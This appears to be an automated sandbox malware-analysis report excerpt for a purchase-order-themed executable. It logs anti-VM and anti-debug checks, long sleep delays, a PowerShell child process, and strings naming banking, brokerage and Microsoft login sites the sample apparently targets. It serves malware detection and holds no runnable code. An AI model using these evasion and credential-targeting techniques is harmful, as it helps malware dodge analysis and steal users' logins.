            Source: C:\Users\user\Desktop\PO Copy_7854569.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Yara detected AntiVM3
            Source: Yara matchFile source: Process Memory Space: PO Copy_7854569.exe PID: 3648, type: MEMORYSTR
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeMemory allocated: 16B0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeMemory allocated: 31D0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeMemory allocated: 3100000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeMemory allocated: 7F80000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeMemory allocated: 8F80000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeMemory allocated: 9230000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeMemory allocated: A230000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0167096E rdtsc 6_2_0167096E
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5799Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2516Jump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exeWindow / User API: threadDelayed 9800Jump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\openfiles.exeAPI coverage: 2.6 %
            Source: C:\Users\user\Desktop\PO Copy_7854569.exe TID: 2212Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2804Thread sleep time: -1844674407370954s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6760Thread sleep time: -1844674407370954s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exe TID: 1632Thread sleep count: 172 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exe TID: 1632Thread sleep time: -344000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exe TID: 1632Thread sleep count: 9800 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exe TID: 1632Thread sleep time: -19600000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe TID: 7032Thread sleep time: -90000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe TID: 7032Thread sleep count: 36 > 30Jump to behavior
            Source: C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe TID: 7032Thread sleep time: -36000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe TID: 7032Thread sleep time: -39000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\openfiles.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_0282B880 FindFirstFileW,FindNextFileW,FindClose,8_2_0282B880
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: HH-71hzM.8.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
            Source: PO Copy_7854569.exe, 00000000.00000002.1981785201.00000000013B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}e
            Source: HH-71hzM.8.drBinary or memory string: discord.comVMware20,11696428655f
            Source: HH-71hzM.8.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
            Source: HH-71hzM.8.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
            Source: HH-71hzM.8.drBinary or memory string: global block list test formVMware20,11696428655
            Source: HH-71hzM.8.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
            Source: HH-71hzM.8.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
            Source: HH-71hzM.8.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
            Source: HH-71hzM.8.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
            Source: HH-71hzM.8.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
            Source: HH-71hzM.8.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
            Source: HH-71hzM.8.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
            Source: HH-71hzM.8.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
            Source: HH-71hzM.8.drBinary or memory string: outlook.office365.comVMware20,11696428655t
            Source: HH-71hzM.8.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
            Source: openfiles.exe, 00000008.00000002.4439171150.0000000002B3A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: HH-71hzM.8.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
            Source: HH-71hzM.8.drBinary or memory string: outlook.office.comVMware20,11696428655s
            Source: HH-71hzM.8.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
            Source: HH-71hzM.8.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
            Source: HH-71hzM.8.drBinary or memory string: AMC password management pageVMware20,11696428655
            Source: sXAKgqpSAiGEzhyDsUSKBxPWz.exe, 0000000A.00000002.4440258284.00000000012EF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll9
            Source: HH-71hzM.8.drBinary or memory string: tasks.office.comVMware20,11696428655o
            Source: HH-71hzM.8.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
            Source: HH-71hzM.8.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
            Source: HH-71hzM.8.drBinary or memory string: interactivebrokers.comVMware20,11696428655
            Source: HH-71hzM.8.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
            Source: HH-71hzM.8.drBinary or memory string: dev.azure.comVMware20,11696428655j
            Source: HH-71hzM.8.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
            Source: HH-71hzM.8.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
            Source: HH-71hzM.8.drBinary or memory string: bankofamerica.comVMware20,11696428655x
            Source: HH-71hzM.8.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
            Source: HH-71hzM.8.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
            Source: firefox.exe, 0000000D.00000002.2679014947.00000265B9DFC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllTT
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0167096E rdtsc 6_2_0167096E
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_00417253 LdrLoadDll,6_2_00417253
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01704164 mov eax, dword ptr fs:[00000030h]6_2_01704164
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01704164 mov eax, dword ptr fs:[00000030h]6_2_01704164
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016C4144 mov eax, dword ptr fs:[00000030h]6_2_016C4144
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016C4144 mov eax, dword ptr fs:[00000030h]6_2_016C4144
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016C4144 mov ecx, dword ptr fs:[00000030h]6_2_016C4144
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016C4144 mov eax, dword ptr fs:[00000030h]6_2_016C4144
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016C4144 mov eax, dword ptr fs:[00000030h]6_2_016C4144
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0162C156 mov eax, dword ptr fs:[00000030h]6_2_0162C156
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016C8158 mov eax, dword ptr fs:[00000030h]6_2_016C8158
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01636154 mov eax, dword ptr fs:[00000030h]6_2_01636154
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01636154 mov eax, dword ptr fs:[00000030h]6_2_01636154
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01660124 mov eax, dword ptr fs:[00000030h]6_2_01660124
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016DE10E mov eax, dword ptr fs:[00000030h]6_2_016DE10E
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016DE10E mov ecx, dword ptr fs:[00000030h]6_2_016DE10E
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016DE10E mov eax, dword ptr fs:[00000030h]6_2_016DE10E
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016DE10E mov eax, dword ptr fs:[00000030h]6_2_016DE10E
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016DE10E mov ecx, dword ptr fs:[00000030h]6_2_016DE10E
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016DE10E mov eax, dword ptr fs:[00000030h]6_2_016DE10E
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016DE10E mov eax, dword ptr fs:[00000030h]6_2_016DE10E
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016DE10E mov ecx, dword ptr fs:[00000030h]6_2_016DE10E
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016DE10E mov eax, dword ptr fs:[00000030h]6_2_016DE10E
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016DE10E mov ecx, dword ptr fs:[00000030h]6_2_016DE10E
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016DA118 mov ecx, dword ptr fs:[00000030h]6_2_016DA118
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016DA118 mov eax, dword ptr fs:[00000030h]6_2_016DA118
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016DA118 mov eax, dword ptr fs:[00000030h]6_2_016DA118
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016DA118 mov eax, dword ptr fs:[00000030h]6_2_016DA118
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016F0115 mov eax, dword ptr fs:[00000030h]6_2_016F0115
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_017061E5 mov eax, dword ptr fs:[00000030h]6_2_017061E5
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016601F8 mov eax, dword ptr fs:[00000030h]6_2_016601F8
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016F61C3 mov eax, dword ptr fs:[00000030h]6_2_016F61C3
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016F61C3 mov eax, dword ptr fs:[00000030h]6_2_016F61C3
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016AE1D0 mov eax, dword ptr fs:[00000030h]6_2_016AE1D0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016AE1D0 mov eax, dword ptr fs:[00000030h]6_2_016AE1D0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016AE1D0 mov ecx, dword ptr fs:[00000030h]6_2_016AE1D0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016AE1D0 mov eax, dword ptr fs:[00000030h]6_2_016AE1D0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016AE1D0 mov eax, dword ptr fs:[00000030h]6_2_016AE1D0
